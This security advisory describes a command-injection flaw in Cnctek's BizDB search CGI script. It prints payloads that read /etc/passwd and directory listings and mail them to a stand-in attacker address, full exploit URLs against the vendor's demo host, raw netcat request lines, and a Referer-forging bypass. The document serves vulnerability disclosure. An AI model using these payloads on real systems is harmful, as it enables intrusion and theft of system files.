COMMAND

    BizDB

SYSTEMS AFFECTED

    BizDB

PROBLEM

    Black Watch Labs found following.  BizDB is a database and  search
    engine software  by Cnctek.   Part of  the installation  is a  CGI
    script,  "bizdb-search.cgi"  which  is  used  to  search the bizdb
    database.   This  script  is  vulnerable  to  modification  of its
    paramater, in such way that  causes it to run user  provided shell
    commands on the server.

    The  bizdb-search.cgi  script  is  probably  a  Perl  script which
    utilizes  the  open  command  without  protection  or input sanity
    checks.  The open  command is used in  order to open the  database
    whose name  appears in  the user  input. As  a result, an attacker
    can  change  this  parameter  and  take  advantage  of  the piping
    feature, so that instead of  the original database file name,  say
    "bizdb", the attacker sends ";  ...  exploit commands ...|",  such
    as  ";cat%20/etc/passwd|mail%20attacker@evil.site|",  in  order to
    send the contents of /etc/passwd file (assuming a UNIX server)  to
    the attacker's  email account.  The script  optionally checks  for
    the HTTP_REFERER field to possess some specific value (that of the
    referring  page),  but  this  field  can  easily  be forged if the
    request is  generated by  a raw  TCP/IP client  (such as "netcat",
    and perhaps even  "telnet"), by sending  the raw GET  request line
    (GET url  HTTP/1.0) followed  by a  Referer line  (Referer: page),
    where the page is the one in which the form was found.

    The  demonstration  area  provided  by  Cnctek  has  a  link  that
    searches for all companies in the database whose name starts  with
    'A'.  This link is

        http://www.cnctek.com/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=bizdb&f6=^a.*&action=searchdbdisplay

    (this link does not work as it does not contain the referer  which
    is why netcat  must be used  to exploit the  vulnerability). If an
    attacker     changes     the      "dbname"     parameter      into
    ";ls|mail%20attacker@evil.site|" and sends the modified request:

        http://www.cnctek.com/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20attacker@evil.site|&f6=^a.*&action=searchdbdisplay

    the results of the ls command will be sent to the attacker's email
    account.   The  arguments  for   the  netcat  command  should   be
    www.cnctek.com 80, and the exact lines for the netcat input  (i.e.
    the HTTP request) are:

        GET
        /cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20attacker@evil.site|&f6=^a.*&action=searchdbdisplay
        HTTP/1.0
        Host: www.cnctek.com
        Referer: http://www.cnctek.com/cgi-bin/bizdb1-search.cgi?bizdb-search
        (empty line)
        (End of Input)

SOLUTION

    The vendor  was contacted,  but does  not seem  to understand  the
    nature of  the problem.   In their  reply, they  claim that  there
    exists  a  mechanism  that  prevents  the  exploit.   BHL strongly
    suspect  they   refer  to   ensuring  that   the    "HTTP_REFERER"
    environment  variable  matches  the  referring  page  in the site.
    Again,  this  provides  no  extra  security,  as  it can by easily
    bypassed by forging the HTTP request.